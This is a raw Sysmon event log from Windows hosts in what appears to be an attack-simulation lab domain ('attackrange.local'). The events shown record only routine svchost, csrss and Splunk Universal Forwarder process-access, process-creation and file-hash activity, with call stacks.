21:51:01.803{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638736Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.803{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638735Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.803{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638734Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.803{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638733Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.803{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638732Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.803{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638731Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.803{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638730Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.803{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638729Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.803{BFB545BB-B864-6058-0500-00000000AF01}6281076C:\Windows\system32\csrss.exe{BFB545BB-B445-605B-335A-00000000AF01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638728Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.803{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B445-605B-335A-00000000AF01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638727Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.804{BFB545BB-B445-605B-335A-00000000AF01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000005918435Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:01.236{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=925D7814388B6C833888F901F3130127,SHA256=D0D1495F7879729F22690D8DD83BBF22E342EF41FCE5836347B9D09DC07BA719,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918434Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:01.235{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D726404720F442C23261FEBA3A1F19D2,SHA256=07612E53967C3E89B8614DE6457F9DF9CD08FEA89091A46E4EA6E39901D2B942,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638757Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.975{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23D21EA4B8FCF913986705094E541AFE,SHA256=D47F8F4D3963E70D5A303F1ACCE03FCD19EA3068504A46636AC13522019D2A7C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918443Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:02.751{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918442Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:02.751{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918441Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:02.355{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=880482D0B5E4168E21075B42C6B7D1E6,SHA256=4273D61944676516D27365B5A704FB43EB1DB37751CA2F07B4475AC1FA73E881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638756Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.834{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA645F1C0E9A5DFBCD8EF62084FDFA1F,SHA256=3A4AE754B27BEE5DBA3AC958BCE514429F94C272E19F6F0BC2143B3F500FF27C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638755Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.631{BFB545BB-B446-605B-345A-00000000AF01}11321824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638754Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.475{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B446-605B-345A-00000000AF01}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638753Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.475{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638752Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.475{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638751Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.475{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638750Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.475{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638749Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.475{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638748Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.475{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638747Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.475{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638746Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.475{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638745Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.475{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638744Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 